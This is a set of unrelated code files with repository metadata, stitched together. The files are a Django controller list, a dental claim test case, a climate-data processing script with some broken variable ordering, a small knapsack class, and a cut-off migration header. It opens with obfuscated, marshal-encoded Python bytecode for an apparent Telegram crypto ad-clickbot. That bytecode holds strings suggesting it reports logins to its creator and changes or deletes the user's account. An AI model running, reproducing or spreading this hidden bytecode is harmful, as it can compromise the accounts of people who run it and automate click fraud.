00\x01\x00\x87\x00f\x01d\x17d\x18\x84\x08}\x03\x88\x00\xa0\x1f|\x03t j!d\x19d\x15d\x1a\x8d\x02\xa1\x02\x01\x00\x87\x00f\x01d\x1bd\x1c\x84\x08}\x04\x88\x00\xa0\x1f|\x04t j!d\x19d\x15d\x1dd\x1e\x8d\x03\xa1\x02\x01\x00d\x1fd \x84\x00}\x05\x88\x00\xa0\x1f|\x05t j!d\x19d\x15d!d\x1e\x8d\x03\xa1\x02\x01\x00\x88\x00\xa0"\xa1\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)"NZ\x07session\xe9\x02\x00\x00\x00z"Usage: python main.py phone_numberz\'Example: python main.py +6281540466655\nr1\x00\x00\x00z\x0fLogin as: %s%s\nr\x19\x00\x00\x00\xfa\x01(\xfa\x01)Z\x07bagas_qi\xab{\xc8\x18iF\xfau$z\r has logged!!Z\x0cbot_scripter)\x01\xda\x01kz\' got you! 
username channel has changes!Z\x08netiranzz\x15Account has deleted!:z\x1ei just wanna delete my accountz\rPreparing ...\xda\x0cBCH_clickbotz\x06/visitc\x01\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x06\x00\x00\x00\x93\x00\x00\x00s\xbe\x01\x00\x00|\x00j\x00}\x01t\x01|\x01\x83\x01t\x02k\t\x90\x01r\xbat\x03|\x01j\x04d\x01\x83\x02\x90\x01r\xbat\x01|\x01j\x04j\x05\x83\x01t\x06k\x08\x90\x01r\xbat\x07|\x01j\x04j\x05\x83\x01}\x02|\x02d\x00k\t\x90\x01r\xbat\x08d\x02\x83\x01\x01\x00d\x03}\x03d\x04}\x04\x90\x01x\\t\t|\x02\x83\x01\\\x02}\x05}\x06t\n|\x06d\x05\x83\x02}\x07|\x07\xa0\x0bd\x06d\x07d\x08i\x01\xa1\x02}\x08|\x07\xa0\x0bd\x06d\td\ni\x01\xa1\x02}\t|\x05d\x0bk\x02r\xcct\x0cj\r\xa0\x0ed\x0ct\x0f\xa0\x10\xa1\x00\xa0\x11d\r\xa1\x01|\x08d\x00k\tr\xbcd\x0en\x02d\x0f|\x04f\x03\x16\x00\xa1\x01\x01\x00P\x00n\xd8|\x05d\x10k\x02\x90\x01r0|\x08d\x00k\x08\x90\x01r0|\td\x00k\t\x90\x01r0|\t\xa0\x12d\x11\xa1\x01}\n|\t\xa0\x12d\x12\xa1\x01}\x0b|\t\xa0\x12d\x13\xa1\x01}\x0ct\x13t\x14|\x0b\x83\x01\x83\x01\x01\x00t\x15j\x16d\x14|\n|\x0cd\x15\x9c\x02t\x17d\x16d\x17\x8d\x04\x01\x00P\x00nt|\x05d\x10k\x02\x90\x01rt|\x08d\x00k\t\x90\x01rtt\x0cj\r\xa0\x0ed\x0ct\x0f\xa0\x10\xa1\x00\xa0\x11d\r\xa1\x01|\x08d\x00k\t\x90\x01rfd\x0en\x02d\x18|\x04f\x03\x16\x00\xa1\x01\x01\x00n0|\x03|\x04k\x02\x90\x01r\xa4t\x18d\x19|\x01j\x04j\x19t\x1a\xa0\x1b\xa1\x00d\x1a\x8d\x03}\r\x88\x00|\r\x83\x01I\x00d\x00H\x00\x01\x00P\x00|\x04d\x1b7\x00}\x04t\x1c\xa0\x1dd\x1c\xa1\x01\x01\x00q^W\x00d\x00S\x00)\x1dN\xda\x0creply_markupz\x0fSending command\xe9\x14\x00\x00\x00r\x01\x00\x00\x00z\x0bhtml.parserZ\x03divZ\x05classz\x0bg-recaptcha\xda\x02idZ\x07headbari.\x01\x00\x00z"[\x1b[0;96m%s\x1b[0;0m] STATUS: %s (%d)\rz\x08%H:%M:%Sz\x12\x1b[1;91mFALSE\x1b[0;0mz\x1e\x1b[1;92m\x1b[1;92mTRUE\x1b[0;0m\x1b[0;0m\xe9\xc8\x00\x00\x00z\tdata-codez\ndata-timerz\ndata-tokenz\x1bhttp://dogeclick.com/reward)\x02\xda\x04codeZ\x05tokenF)\x03r\x14\x00\x00\x00r/\x00\x00\x00r0\x00\x00\x00z\x11\x1b[1;92mTRUE\x1b[0;0mrN\x00\x00\x00)\x01r\x14\x00\x00\x00r1\x00\x00\x00\xe9\x03\x00\x00\x00)\x1e\xda\x0foriginal_updaterB\x00\x00\x00r\x04\x00\x00\x00\xda\x07hasattr\xda\x07messagerO\x00\x00\x00r\x05\x00\x00\x00rC\x00\x00\x00r"\x00\x00\x00r9\x00\x00\x00r\x0f\x00\x00\x00\xda\x04findr;\x00\x00\x00r<\x00\x00\x00r=\x00\x00\x00r\x0e\x00\x00\x00r \x00\x00\x00r!\x00\x00\x00r\x16\x00\x00\x00rA\x00\x00\x00\xda\x03intr\x15\x00\x00\x00Z\x04postr2\x00\x00\x00\xda\x0bbotcallbackrQ\x00\x00\x00Z\x04Khcj\xda\x06encoder>\x00\x00\x00r?\x00\x00\x00)\x0e\xda\x05eventZ\x04Khcbr5\x00\x00\x00Z\x04KhcyZ\x04KhcDr7\x00\x00\x00r8\x00\x00\x00Z\x04KhcSZ\x02cc\xda\x02ttZ\x04KhciZ\x04KhcVZ\x04KhcfZ\x04KhcE)\x01\xda\x04Khclr\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPkc\x00\x00\x00s>\x00\x00\x00\x00\x01\x06\x01\x0e\x01 \x01\x0c\x01\n\x01\x08\x01\x04\x01\x04\x01\x04\x01\x0c\x01\n\x01\x10\x01\x10\x01\x08\x01,\x01\x04\x01\x1e\x01\n\x01\n\x01\n\x01\x0c\x01\x18\x01\x04\x01\x14\x010\x01\n\x01\x16\x01\x0e\x01\x02\x01\x08\x01z\x12KhPF.<locals>.KhPkT)\x02\xda\x08incoming\xda\x05chatsc\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x93\x00\x00\x00s*\x00\x00\x00t\x00t\x01d\x01\x17\x00t\x02\x17\x00\x83\x01\x01\x00t\x00d\x02\x83\x01\x01\x00\x88\x00\xa0\x03\xa1\x00I\x00d\x00H\x00\x01\x00d\x00S\x00)\x03Nz\x1aAds not available detectedZ\rDisconnecting)\x04r"\x00\x00\x00\xda\x04KhPd\xda\x04KhPGZ\ndisconnect)\x01r\\\x00\x00\x00)\x01r^\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPL\x84\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x10\x01\x08\x01z\x12KhPF.<locals>.KhPLz&Sorry, there are no new ads 
available.)\x03r`\x00\x00\x00ra\x00\x00\x00Z\x07patternc\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\xd3\x00\x00\x00s \x00\x00\x00t\x00|\x00j\x01\x83\x01r\x1ct\x02t\x03|\x00j\x04\x17\x00d\x01\x17\x00\x83\x01\x01\x00d\x00S\x00)\x02NrD\x00\x00\x00)\x05rB\x00\x00\x00rU\x00\x00\x00r"\x00\x00\x00\xda\x04KhPqZ\x08raw_text)\x01r\\\x00\x00\x00r\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPe\x89\x00\x00\x00s\x04\x00\x00\x00\x00\x01\n\x01z\x12KhPF.<locals>.KhPez\nYou earned)#\xda\x02os\xda\x04path\xda\x06exists\xda\x05mkdirrI\x00\x00\x00r)\x00\x00\x00r;\x00\x00\x00\xda\x04argvr\x1f\x00\x00\x00r3\x00\x00\x00r\x1d\x00\x00\x00\xda\x05startZ\x06get_meZ\nfirst_nameZ\x08usernamerQ\x00\x00\x00r\x1a\x00\x00\x00Z\nget_entityZ\x07creator\xda\nchusername\xda\x04joinZ\x06randomZ\x07choicesZ\x06stringZ\x06digitsr\n\x00\x00\x00\xda\nValueErrorr\x08\x00\x00\x00r\x0b\x00\x00\x00r"\x00\x00\x00Z\x0csend_messageZ\x11add_event_handlerr\x03\x00\x00\x00Z\nNewMessageZ\x16run_until_disconnected)\x06\xda\x02meZ\x04KhcJr]\x00\x00\x00r_\x00\x00\x00rd\x00\x00\x00rf\x00\x00\x00r\x18\x00\x00\x00)\x01r^\x00\x00\x00r\x19\x00\x00\x00\xda\x04KhPFE\x00\x00\x00sH\x00\x00\x00\x00\x01\x0c\x01\n\x01\x06\x01\x0e\x01\x08\x01\x08\x01\x08\x01\x0e\x01\x16\x01\x0e\x018\x01 \x01\x1e\x01\x02\x01\x10\x01\x08\x01*\x01\x06\x01\x12\x01\x14\x01\x06\x01\x02\x01\x18\x01\x08\x01\x16\x01\x10\x01\x06\x01\x08\x01\x12\x01\x0c \x16\x01\x0c\x04\x18\x01\x08\x03\x18\x01rq\x00\x00\x00)\x01N)\x01F)\x02r-\x00\x00\x00N)?Z\x08telethonr\x02\x00\x00\x00r\x03\x00\x00\x00Z\x11telethon.tl.typesr\x04\x00\x00\x00r\x05\x00\x00\x00r\x06\x00\x00\x00Z\x1etelethon.tl.functions.messagesr\x07\x00\x00\x00rZ\x00\x00\x00Z\x1dtelethon.tl.functions.accountr\x08\x00\x00\x00Z\x1etelethon.tl.functions.channelsr\t\x00\x00\x00rm\x00\x00\x00Z\x1ctelethon.errors.rpcerrorlistr\n\x00\x00\x00r\x0b\x00\x00\x00Z\x08coloramar\x0c\x00\x00\x00r\r\x00\x00\x00Z\x04KhcPZ\x05RESETrc\x00\x00\x00Z\x03REDrb\x00\x00\x00Z\x07MAGENTAZ\x04KhPnZ\x05GREENre\x00\x00\x00r\x0e\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00rE\x00\x00\x00rF\x00\x00\x00\xda\x02tbZ\x03bs4r\x0f\x00\x00\x00rg\x00\x00\x00\xda\x02rer>\x00\x00\x00r\x15\x00\x00\x00r;\x00\x00\x00Z\x07asyncioZ\x0eget_event_loopZ\x04KhPjZ\x04KhcAr\x1b\x00\x00\x00r\x1c\x00\x00\x00r2\x00\x00\x00\xda\x06system\xda\x04namer\x1a\x00\x00\x00r\x1d\x00\x00\x00r"\x00\x00\x00r,\x00\x00\x00r9\x00\x00\x00rA\x00\x00\x00rC\x00\x00\x00rI\x00\x00\x00rq\x00\x00\x00Z\x12run_until_complete\xda\x11KeyboardInterruptr\x18\x00\x00\x00r\x18\x00\x00\x00r\x18\x00\x00\x00r\x19\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00sL\x00\x00\x00\x10\x01\x14\x01\x0c\x01\x0c\x01\x0c\x01\x10\x01\x10\x01\x06\x01\x06\x01\x06\x01\x06\x01\n\x01\x0c\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x0c\x010\x01\x06\x01\x06\x01\x04\x01\x04\x01\x08\x01\x1a\x01\x02\x01\x08\x02\n\x02\n\x05\x08\x04\n\x0c\x08\x04\x08\x06\x08\x06\x08I\x10\x01\x10\x01'))
|
[
"dindacgr2@gmail.com"
] |
dindacgr2@gmail.com
|
89af1b2212557b7e7be169b88220d18081782bf6
|
2e8e55636b879af65b7ba9753a8c11c8e30c0ebe
|
/src/controllers/__init__.py
|
47264b39f17e5098a44049263628533c83ccb74f
|
[] |
no_license
|
ScottBurleighHeads/Portfolio
|
9db72161589892bd8bfb844bd7b854709c5dba0f
|
2e2e1631ec98c096d9586af444aa0474b2b08cf5
|
refs/heads/main
| 2023-05-14T16:14:06.528988
| 2021-06-10T04:18:15
| 2021-06-10T04:18:15
| 351,339,476
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 248
|
py
|
from controllers.index import index
from controllers.aboutMe import aboutMe
from controllers.contact import contact
from controllers.project import project
registerable_controllers = [
index,
aboutMe,
contact,
project
]
|
[
"scottmcarpentry@gmail.com"
] |
scottmcarpentry@gmail.com
|
c031f3295b1ed90617b561c8f7640b752aad51fd
|
af53fb6bd0cd0ff70c68e43482b49420f0262764
|
/odonto/odonto_submissions/supplier_testing/case_43.py
|
84c48fea337719163487c20c990d24e7a60d00b3
|
[] |
no_license
|
gmolate/odonto
|
34b41c18b972c7e10be46874a630c0016d6f7237
|
f198608c41e9b991550a7929d28eb10002a3a664
|
refs/heads/master
| 2020-12-08T00:47:43.903738
| 2019-04-30T15:19:18
| 2019-04-30T15:19:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,711
|
py
|
import datetime
from odonto.odonto_submissions.serializers import translate_to_bdcs1
from fp17 import treatments, exemptions
def annotate(bcds1):
bcds1.patient.surname = "CARTWRIGHT"
bcds1.patient.forename = "TOM"
bcds1.patient.address = ["40 HIGH STREET"]
bcds1.patient.sex = 'M'
bcds1.patient.date_of_birth = datetime.date(1978, 12, 31)
bcds1.date_of_acceptance = datetime.date(2017, 4, 1)
bcds1.date_of_completion = datetime.date(2017, 4, 1)
# "Universal Credit"
bcds1.exemption_remission = {
'code': exemptions.UNIVERSAL_CREDIT.EVIDENCE_SEEN,
}
# Treatments: "Examination, Extraction 1"
bcds1.treatments = [
treatments.EXAMINATION,
treatments.EXTRACTION(1),
# 'Band 4'
treatments.TREATMENT_CATEGORY_URGENT,
]
return bcds1
def from_model(bcds1, patient, episode):
demographics = patient.demographics()
demographics.surname = "CARTWRIGHT"
demographics.first_name = "TOM"
demographics.house_number_or_name = "40"
demographics.street = "HIGH STREET"
demographics.sex = "Male"
demographics.date_of_birth = datetime.date(1978, 12, 31)
demographics.save()
episode.fp17exemptions_set.update(
universal_credit=True,
evidence_of_exception_or_remission_seen=True
)
episode.fp17clinicaldataset_set.update(
examination=True,
extractions=1
)
episode.fp17treatmentcategory_set.update(
urgent_treatment=True,
)
episode.fp17incompletetreatment_set.update(
date_of_acceptance=datetime.date(2017, 4, 1),
completion_or_last_visit=datetime.date(2017, 4, 1)
)
translate_to_bdcs1(bcds1, episode)
|
[
"fredkingham@gmail.com"
] |
fredkingham@gmail.com
|
463e34a0ed580f880b1b6faaa67e1eb98751a792
|
df6d070cf9b984d291dfe23df5b3dc11fe6a32ac
|
/old_scripts/CCCM/2010_dataset.py
|
c2154df67f5ef4e2877280570cc030a44c4b5279
|
[] |
no_license
|
tristanohanlon/climate-analysis
|
5a439e4f08d6cae5a0f6cfec9bb5c5e4f59f122b
|
7e8a97cf83a308772cc7bc3081b3f117cc0eeb6d
|
refs/heads/master
| 2023-02-12T13:15:22.995914
| 2021-01-09T20:32:19
| 2021-01-09T20:32:19
| 184,121,830
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,476
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 5 09:26:33 2019
@author: Tristan O'Hanlon
"""
import time
import numpy as np
import os
from pyhdf import SD
import h5py
import matplotlib.pyplot as plt
###############################################################################
cccm21_cloud_free_area = []
cccm34_phase = []
cccm52_cloud_fraction_profile = []
start = time.time()
# The directory where your HDF files are stored
os.chdir('d:/Downloads/CCCM/2010') # Home PC
# Load every file in the directory
for filename in os.listdir():
# Load the file
f = SD.SD(filename)
# cccm21_cloud_free_area = cccm21_cloud_free_area + f.select('Cloud free area percent coverage (CALIPSO-CloudSat)').get().tolist()
# cccm34_phase = cccm34_phase + f.select('Mean group cloud particle phase from MODIS radiance (3.7)').get().tolist()
# cccm52_cloud_fraction_profile = cccm52_cloud_fraction_profile + f.select('Cloud fraction profile').get().tolist()
end = time.time()
print('Importing data from files to lists took:', end - start, 's')
start = time.time()
cccm21_cloud_free_area = np.array(cccm21_cloud_free_area)
cccm34_phase = np.array(cccm34_phase)
cccm52_cloud_fraction_profile = np.array(cccm52_cloud_fraction_profile)
end = time.time()
print('Create arrays took:', end - start, 's')
############################################################################### Save raw data
# specify path and file name to create
with h5py.File('2010_raw_data.h5', 'w') as p:
p.create_dataset('cccm21_cloud_free_area', data=cccm21_cloud_free_area)
p.create_dataset('cccm34_phase', data=cccm34_phase)
p.create_dataset('cccm52_cloud_fraction_profile', data=cccm52_cloud_fraction_profile)
p.close()
############################################################################### Load raw data
"""
import h5py
os.chdir('//synthesis/e/University/University/MSc/Models/climate-analysis/CCCM')
f = h5py.File('2010_raw_data.h5', 'r')
#cccm21_cloud_free_area = f['cccm21_cloud_free_area'][:]
#cccm34_phase = f['cccm34_phase'][:]
cccm52_cloud_fraction_profile = f['cccm52_cloud_fraction_profile'][:]
f.close()
"""
############################################################################### Get Southern Ocean Data - get lat first
# Join the two lists as if they were two columns side by side, into a list of two elements each
a = np.vstack(lat)
combined = np.hstack((a, cccm52_cloud_fraction_profile))
#print ("combined")
#print (combined)
# Add a column for every additional column, -1 will sort by the first column
combined = combined[np.lexsort(np.transpose(combined)[:-1])]
#print ("sorted")
#print (combined)
#Select latitudes over the southern ocean
combined = combined[combined[:,0]>=-70]
combined = combined[combined[:,0]<=-50]
#Split the combined array into just the lw data, eliminating the first coloumn of latitude
cccm52_cloud_fraction_profile_so = combined[:,1:114]
#alt = alt[0:137] #scale alt if necessary
############################################################################### Reduce and convert cloud free area to cloud area
cccm52_cloud_fraction_profile_alt = np.vstack((cccm121_alt, np.nanmean(cccm52_cloud_fraction_profile, axis = 0))).T
cccm52_cloud_fraction_profile_alt_so = np.vstack((cccm121_alt, np.nanmean(cccm52_cloud_fraction_profile_so, axis = 0))).T
cccm21_cloud_free_area = (100 - cccm21_cloud_free_area) / 100
############################################################################### Reduce cloud free area
# Join the two lists as if they were two columns side by side, into a list of two elements each
combined = np.vstack((lat, cccm21_cloud_free_area)).T
#print ("combined")
#print (combined)
#print("get unique lats")
unique = np.unique(lat)
#print(unique)
# Add a column for every additional column, -1 will sort by the first column
combined = combined[np.lexsort(np.transpose(combined)[:-1])]
#print ("sorted")
#print (combined)
# Averages of (lat, cloud ice water content) empty array
averages_total = unique.size
cccm_tcc_lat = np.empty((averages_total,2),dtype=float)
# Current subtotal of current lat
subtotal = 0.0
# Current number of cloud ice water content entries in subtotal
number = 0
# The current lat starts out unset
current_lat = None
# Iterate through all of the (lat, cloud ice water content) elements and subtotal the same lat values
i = 0
for item in combined:
if np.isnan(item[1]):
continue
if current_lat is None:
"""
print("setting current_lat to item[0]")
print("(current_lat == item[0]) = ", end='')
print(current_lat == item[0])
"""
        current_lat = item[0]
# If the lat is not the same as last time, then perform the average calc and reset everything
if item[0] != current_lat:
# Find the average value.
average = subtotal / number
"""
print("--------")
print("lat: ", end='')
print(current_lat, end='')
print(", avg: ", end='')
print(average, end='')
print(", subtotal: ", end='')
print(subtotal, end='')
print(", number: ", end='')
print(number)
"""
# Append the average
cccm_tcc_lat[i] = [current_lat, average]
# Reset the subtotal
subtotal = 0.0
number = 0
# Set the current latitude
current_lat = item[0]
# Move to the next index in the averages array
i+=1
# Add the next value to the subtotal
number+=1
subtotal+=item[1]
# Catch the last entry in the for loop
average = subtotal / number
cccm_tcc_lat[i] = [current_lat, average]
cccm21_cloud_area_fraction = cccm_tcc_lat
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/reduced_datasets') # Home PC
f = h5py.File('2010_CCCM.h5', 'r')
cccm81b_cloud_area_enhanced = f['tcc'][:]
f.close()
############################################################################### Save reduced data
os.chdir('//synthesis/e/University/University/MSc/Models/climate-analysis/CCCM')
with h5py.File('2010_cloud_fractions.h5', 'w') as p:
p.create_dataset('cccm21_cloud_area_fraction', data=cccm21_cloud_area_fraction)
p.create_dataset('cccm52_cloud_fraction_profile_alt', data=cccm52_cloud_fraction_profile_alt)
p.create_dataset('cccm52_cloud_fraction_profile_alt_so', data=cccm52_cloud_fraction_profile_alt_so)
p.create_dataset('cccm81b_cloud_area_enhanced', data=cccm81b_cloud_area_enhanced)
p.close()
############################################################################### Load reduced data
"""
os.chdir('//synthesis/e/University/University/MSc/Models/climate-analysis/CCCM')
f = h5py.File('2010_cloud_fractions.h5', 'r')
cccm21_cloud_area_fraction = f['cccm21_cloud_area_fraction'][:]
cccm52_cloud_fraction_profile_alt = f['cccm52_cloud_fraction_profile_alt'][:]
cccm52_cloud_fraction_profile_alt_so = f['cccm52_cloud_fraction_profile_alt_so'][:]
cccm81b_cloud_area_enhanced = f['cccm81b_cloud_area_enhanced'][:]
f.close()
"""
############################################################################### Load reduced phase data
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/') # Home PC
f = h5py.File('2010_cccm85_enhanced_lwc.h5', 'r')
cccm85_enhanced_lwc_lat = f['cccm85_enhanced_lwc_lat'][:]
cccm85_enhanced_lwc_alt = f['cccm85_enhanced_lwc_alt'][:]
cccm85_enhanced_lwc_alt_so = f['cccm85_enhanced_lwc_alt_so'][:]
cccm85_enhanced_lwc_alt = np.vstack((cccm123_alt, cccm85_enhanced_lwc_alt)).T
f.close()
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/') # Home PC
f = h5py.File('2010_cccm86_enhanced_iwc.h5', 'r')
cccm86_enhanced_iwc_lat = f['cccm86_enhanced_iwc_lat'][:]
cccm86_enhanced_iwc_alt = f['cccm86_enhanced_iwc_alt'][:]
cccm86_enhanced_iwc_alt_so = f['cccm86_enhanced_iwc_alt_so'][:]
f.close()
############################################################################### Create phase fraction data
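# Per-phase fractions: the liquid (ice) share of total condensate, scaled by total cloud cover
# (cccm21_cloud_free_area was converted to a cloud area fraction above)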
tclw_frac = np.vstack((cccm85_enhanced_lwc_lat[:,0], (cccm85_enhanced_lwc_lat[:,1] / (cccm85_enhanced_lwc_lat[:,1] + cccm86_enhanced_iwc_lat[:,1])) * cccm21_cloud_free_area[:,1])).T
tciw_frac = np.vstack((cccm86_enhanced_iwc_lat[:,0], (cccm86_enhanced_iwc_lat[:,1] / (cccm85_enhanced_lwc_lat[:,1] + cccm86_enhanced_iwc_lat[:,1])) * cccm21_cloud_free_area[:,1])).T
"""
fig, ax = plt.subplots()
ax.plot(cccm85_enhanced_lwc_lat[:,0], tclw_frac, '-k')
#ax.plot(cccm85_enhanced_lwc_lat[:,0], tclw_frac81, '-b')
ax.plot(cccm85_enhanced_lwc_lat[:,0], tciw_frac, '--k')
ax.plot(cccm21_cloud_free_area[:,0], cccm21_cloud_free_area[:,1], '--b')
"""
lw_frac = np.vstack((cccm85_enhanced_lwc_alt[:,0], (cccm85_enhanced_lwc_alt[:,1] / (cccm85_enhanced_lwc_alt[:,1] + cccm86_enhanced_iwc_alt[:,1])) * cccm52_cloud_fraction_profile_alt[:,1])).T
iw_frac = np.vstack((cccm86_enhanced_iwc_alt[:,0], (cccm86_enhanced_iwc_alt[:,1] / (cccm85_enhanced_lwc_alt[:,1] + cccm86_enhanced_iwc_alt[:,1])) * cccm52_cloud_fraction_profile_alt[:,1])).T
"""
fig, ax = plt.subplots()
ax.plot(lw_frac, cccm52_cloud_fraction_profile_alt[:,0], '-k')
#ax.plot(cccm85_enhanced_lwc_lat[:,0], tclw_frac81, '-b')
ax.plot(iw_frac, cccm52_cloud_fraction_profile_alt[:,0], '--k')
ax.plot(cccm52_cloud_fraction_profile_alt[:,1], cccm52_cloud_fraction_profile_alt[:,0], '--b')
"""
lw_frac_so = np.vstack((cccm85_enhanced_lwc_alt_so[:,0], (cccm85_enhanced_lwc_alt_so[:,1] / (cccm85_enhanced_lwc_alt_so[:,1] + cccm86_enhanced_iwc_alt_so[:,1])) * cccm52_cloud_fraction_profile_alt_so[:,1])).T
iw_frac_so = np.vstack((cccm86_enhanced_iwc_alt_so[:,0], (cccm86_enhanced_iwc_alt_so[:,1] / (cccm85_enhanced_lwc_alt_so[:,1] + cccm86_enhanced_iwc_alt_so[:,1])) * cccm52_cloud_fraction_profile_alt_so[:,1])).T
############################################################################### Load Previous data
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/raw_datasets') # Home PC
f = h5py.File('2010_CCCM_profile_variables.h5', 'r')
lat = f['lat'][:]
cccm123_alt = f['alt'][:]
cccm121_alt = f['alt_c'][:]
cccm124_alt = f['alt_t'][:]
pressure_g = f['pressure_g_alt'][:]
pressure_so = f['pressure_so_alt'][:]
temp_g = f['temp_g_alt'][24:137]
temp_so = f['temp_so_alt'][24:137]
air_density_g = f['air_density_g'][:]
air_density_so = f['air_density_so'][:]
f.close()
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/reduced_datasets') # Home PC
f = h5py.File('2010_CCCM.h5', 'r')
tclw = f['tclw'][:]
tciw = f['tciw'][:]
cccm85_specific_lwc_alt = f['lw'][:]
cccm86_specific_iwc_alt = f['iw'][:]
cccm85_specific_lwc_alt_so = f['lw_so'][:]
cccm86_specific_iwc_alt_so = f['iw_so'][:]
cccm85_specific_lwc_temp = f['lw_t'][:]
cccm86_specific_iwc_temp = f['iw_t'][:]
cccm85_specific_lwc_temp_so = f['lw_t_so'][:]
cccm86_specific_iwc_temp_so = f['iw_t_so'][:]
f.close()
############################################################################### Create temperature data
cf_frac_temp = np.vstack((temp_g[:, 1], cccm52_cloud_fraction_profile_alt[:,1])).T
lw_frac_temp = np.vstack((temp_g[:, 1], lw_frac[:,1])).T
iw_frac_temp = np.vstack((temp_g[:, 1], iw_frac[:,1])).T
cf_frac_temp_so = np.vstack((temp_so[:, 1], cccm52_cloud_fraction_profile_alt_so[:,1])).T
lw_frac_temp_so = np.vstack((temp_so[:, 1], lw_frac_so[:,1])).T
iw_frac_temp_so = np.vstack((temp_so[:, 1], iw_frac_so[:,1])).T
############################################################################### Create new datasets
os.chdir('e:/University/University/MSc/Models/climate-analysis/CCCM/reduced_datasets') # Home PC
with h5py.File('2010_data_new.h5', 'w') as p:
p.create_dataset('lat', data=lat)
p.create_dataset('alt', data=cccm121_alt)
p.create_dataset('air_density_g', data=air_density_g)
p.create_dataset('air_density_so', data=air_density_so)
p.create_dataset('tcc', data=cccm21_cloud_area_fraction)
p.create_dataset('tclw', data=tclw)
p.create_dataset('tciw', data=tciw)
p.create_dataset('tclw_gcm3', data=cccm85_enhanced_lwc_lat)
p.create_dataset('tciw_gcm3', data=cccm86_enhanced_iwc_lat)
p.create_dataset('tclw_frac', data=tclw_frac)
p.create_dataset('tciw_frac', data=tciw_frac)
p.create_dataset('cf', data=cccm52_cloud_fraction_profile_alt)
p.create_dataset('cf_so', data=cccm52_cloud_fraction_profile_alt_so)
p.create_dataset('lw_frac', data=lw_frac)
p.create_dataset('lw_frac_so', data=lw_frac_so)
p.create_dataset('iw_frac', data=iw_frac)
p.create_dataset('iw_frac_so', data=iw_frac_so)
p.create_dataset('lw', data=cccm85_specific_lwc_alt)
p.create_dataset('lw_so', data=cccm85_specific_lwc_alt_so)
p.create_dataset('iw', data=cccm86_specific_iwc_alt)
p.create_dataset('iw_so', data=cccm86_specific_iwc_alt_so)
p.create_dataset('temp', data=temp_g)
p.create_dataset('temp_so', data=temp_so)
p.create_dataset('pressure', data=pressure_g)
p.create_dataset('pressure_so', data=pressure_so)
p.create_dataset('lw_t', data=cccm85_specific_lwc_temp)
p.create_dataset('lw_t_so', data=cccm85_specific_lwc_temp_so)
p.create_dataset('iw_t', data=cccm86_specific_iwc_temp)
p.create_dataset('iw_t_so', data=cccm86_specific_iwc_temp_so)
p.create_dataset('cf_t', data=cf_frac_temp)
p.create_dataset('cf_t_so', data=cf_frac_temp_so)
p.create_dataset('lw_frac_temp', data=lw_frac_temp)
p.create_dataset('lw_frac_temp_so', data=lw_frac_temp_so)
p.create_dataset('iw_frac_temp', data=iw_frac_temp)
p.create_dataset('iw_frac_temp_so', data=iw_frac_temp_so)
p.close()
############################################################################### Test plots
"""
fig, ax = plt.subplots()
ax.plot(tclw_frac[:,0], tclw_frac[:, 1], '-k')
ax.plot(tciw_frac[:,0], tciw_frac[:, 1], '--k')
ax.plot(cccm21_cloud_free_area[:,0], cccm21_cloud_free_area[:,1], '--b')
fig, ax = plt.subplots()
ax.plot(lw_frac_so[:,1], lw_frac_so[:, 0], '-k')
ax.plot(iw_frac_so[:,1], iw_frac_so[:, 0], '--k')
ax.plot(cccm52_cloud_fraction_profile_alt_so[:,1], cccm52_cloud_fraction_profile_alt_so[:,0], '-b')
fig, ax = plt.subplots()
ax.plot(lw_frac_temp[:,0], lw_frac_temp[:, 1], '-k')
ax.plot(iw_frac_temp[:,0], iw_frac_temp[:, 1], '--k')
ax.plot(cf_frac_temp[:,0], cf_frac_temp[:,1], '-b')
fig, ax = plt.subplots()
ax.plot(lw_frac_temp[:,0], lw_frac_temp[:, 1], '-k')
ax.plot(lw_frac_temp_so[:,0], lw_frac_temp_so[:, 1], '--k')
"""
|
[
"tristan.ohanlon@gmail.com"
] |
tristan.ohanlon@gmail.com
|
18127fdf9c9f5cca291bd624b9c70e6873dac44b
|
c44540782ad0bfc0421b8acccf37c941a676ac0e
|
/package.py
|
931df5f46a2d9ffbb1cf2a96df26f9f3d1d9e90d
|
[] |
no_license
|
pepetorres1998/tso_activity_2
|
b2629c2fd03bc9e615df18337ae1e60a740b554a
|
6a90f56bddec11ac5cd7bef373b8bace10df3117
|
refs/heads/master
| 2020-07-12T10:22:06.059267
| 2019-08-28T18:15:27
| 2019-08-28T18:15:27
| 204,791,667
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 384
|
py
|
class Package:
def __init__(self, max_weight):
self.elements = []
self.weight = 0
self.value = 0
self.max_weight = max_weight
def add_element(self, element):
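        # Add the element only if it fits within the remaining weight capacity; otherwise it is silently skipped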
        if element.weight + self.weight <= self.max_weight:
self.elements.append(element)
self.value += element.value
self.weight += element.weight
|
[
"jtorres@syscap.com.mx"
] |
jtorres@syscap.com.mx
|
e18b85bf87a5b4bf43d8dd5767ab31b021f0aeb5
|
10cc60ed8a2f65de1ce0bb54afe6ea66c15596f0
|
/crops/migrations/0003_auto_20150810_2312.py
|
69893feef074438bd27e3097536f58e6f2fa28b1
|
[] |
no_license
|
sammyteahan/sfg-server
|
896340e058fb2a6422079bb47ffa552593d2df3d
|
b655bdfe26197227f9576ed825b65ef05f7ebe4e
|
refs/heads/master
| 2020-04-05T22:57:02.015493
| 2017-04-09T18:57:20
| 2017-04-09T18:57:20
| 40,629,302
| 1
| 0
| null | null | null | null |
